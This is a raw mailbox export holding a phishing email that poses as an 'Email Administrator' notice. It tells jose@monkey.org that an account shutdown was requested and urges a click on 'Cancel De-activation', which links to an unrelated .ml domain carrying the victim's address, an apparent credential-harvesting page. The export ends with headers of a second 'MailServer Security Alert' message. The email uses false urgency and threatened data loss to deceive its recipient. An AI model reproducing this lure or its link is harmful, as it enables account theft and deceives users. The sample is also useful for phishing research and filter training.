From: "Email Admin" <noreply@reedmanch.com>
Date: Mon, 25 Jun 2018 06:11:06 -0700
Reply-To: g.murray20220@gmail.com
Status: O
X-Status: 
X-Keywords:                  
X-UID: 524

You will not see this in a MIME-aware mail reader.
--===============1440797095==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =


   	  =

    =

   =

 =

   Server Message =

  =


 =

    Our record indicates that you recently made a request to shutdown your =
email jose@monkey.org. And this request will be processed shortly. If this =
request was made accidentally and you have no knowledge of it, you are advi=
sed to cancel the request now =


  =

   =

    Cancel De-activation =

  =

   =

   However, if you do not cancel this request, then your account will be sh=
utdown shortly =

and all your email data will be lost permanently. Regards.
Email Administrator =


  =

   =

    =

 =

   =

   This message is auto-generated from E-mail security server, and replies =
sent to this email can not be delivered. =

This email is meant for:jose@monkey.org; =

  =

	=20
--===============1440797095==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><HEAD><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/>
<META name=3DGENERATOR content=3D"MSHTML 11.00.9600.18860"></HEAD>
<BODY>
<TABLE width=3D"100%" align=3Dcenter><BR>
<TBODY>
<TR>
<TD width=3D"10%"></TD>
<TD width=3D"70%">
<TABLE style=3D"BORDER-TOP: #a4a4a4 1px solid; BORDER-RIGHT: #a4a4a4 1px so=
lid; BORDER-BOTTOM: #a4a4a4 1px solid; BORDER-LEFT: #a4a4a4 1px solid" cell=
Spacing=3D0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=3D0 width=3D"100%">
<TBODY>
<TR>
<TD bgColor=3D#045fb4 height=3D110><BR>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT color=3D#ffffff size=3D+4 face=3Dcalibri>Server Message </FONT></=
TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8><BR><BR>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD>
<P><FONT size=3D3 face=3Dcalibri>Our record indicates that you recently mad=
e a request to shutdown your email jose@monkey.org. And this request will b=
e processed shortly. =

<P>If this request was made accidentally and you have no knowledge of it, y=
ou are advised to cancel the request now </FONT></P></TD></TR></TBODY></TAB=
LE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D15></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE height=3D60 width=3D"80%" align=3Dcenter bgColor=3D#045fb4>
<TBODY>
<TR>
<TD>
<DIV align=3Dcenter><A style=3D"TEXT-DECORATION: none" href=3D"http://bvnma=
nb.ml/blues/hura/freeedm/admin.php?userid=3Djose@monkey.org" target=3D_blan=
k><FONT color=3D#ffffff size=3D+2 face=3Dcalibri>Cancel De-activation </FON=
T></A></DIV></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D20></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D70>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D3 face=3Dcalibri>However, if you do not cancel this reques=
t, then your account will be shutdown shortly <BR>and all your email data w=
ill be lost permanently. =

<P>Regards.<BR><B>Email Administrator</B> </FONT></P></TD></TR></TBODY></TA=
BLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D10></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE height=3D10 width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD>
<HR align=3Dcenter width=3D"100%">
</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8>
<TABLE width=3D"80%" align=3Dcenter>
<TBODY>
<TR>
<TD><FONT size=3D2 face=3Dcalibri>This message is auto-generated from E-mai=
l security server, and replies sent to this email can not be delivered. <BR=
>This email is meant for:jose@monkey.org;</FONT></B> </FONT></TD></TR></TBO=
DY></TABLE></TD></TR>
<TR>
<TD bgColor=3D#f8f8f8 height=3D30></TD></TR></TBODY></TABLE></TD></TR></TBO=
DY></TABLE></TD>
<TD width=3D"20%"></TD></TR></TBODY></TABLE></BODY></HTML>
--===============1440797095==--

From jose@monkey.org Tue Jun 26 23:16:43 2018 +0000
Return-Path: noreply@reedmanch.com
Delivered-To: jose@monkey.org
X-FDA: 74320271886.27.box29_7a8dcc1f71c
X-Spam-Summary: 75,0,0,c13bbb80add75efc,d41d8cd98f00b204,noreply@reedmanch.com,:,RULES_HIT:41:72:379:495:800:962:966:967:973:983:988:989:1147:1189:1208:1221:1254:1260:1263:1313:1314:1381:1431:1433:1434:1436:1437:1516:1517:1518:1534:1542:1571:1575:1588:1589:1592:1594:1685:1711:1714:1730:1777:1792:2084:2196:2198:2199:2200:2525:2560:2563:2610:2682:2685:2693:2737:2790:2859:2890:2894:2933:2937:2939:2942:2945:2947:2951:2954:2986:3022:3138:3139:3140:3141:3142:3351:3865:3866:3867:3868:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4361:4385:4552:5007:6261:6678:7652:7801:8516:8518:8599:8603:8797:8987:9025:9121:9344:9388:9466:10004:10044:10049:10215:10346:10400:11233:11473:11657:11658:11914:12043:12555:12740:12895:12903:12986:13025:13095:13139:13237:13374:13439:14093:14096:14181:14686:14721:14827:14828:14849:14877:18000:21080:21212:21433:21450:21451:21524:21627:21716:30001:30021:30022:30026:30054,0,RBL:198.20.229.237-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none
X-HE-Tag: box29_7a8dcc1f71c
X-Filterd-Recvd-Size: 4742
Received: from man.manchcommunications.com (unknown [198.20.229.237])
	by imf22.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 26 Jun 2018 23:16:43 +0000 (UTC)
X-No-Relay: not in my network
Received: from [191.101.31.80] (unknown [191.101.31.80])
	by man.manchcommunications.com (Postfix) with ESMTPA id 6C6822E2286F
	for <jose@monkey.org>; Tue, 26 Jun 2018 17:11:52 -0500 (CDT)
Content-Type: multipart/alternative; boundary="===============1841503952=="
MIME-Version: 1.0
Subject: MailServer Security Alert
To: jose@monkey.org
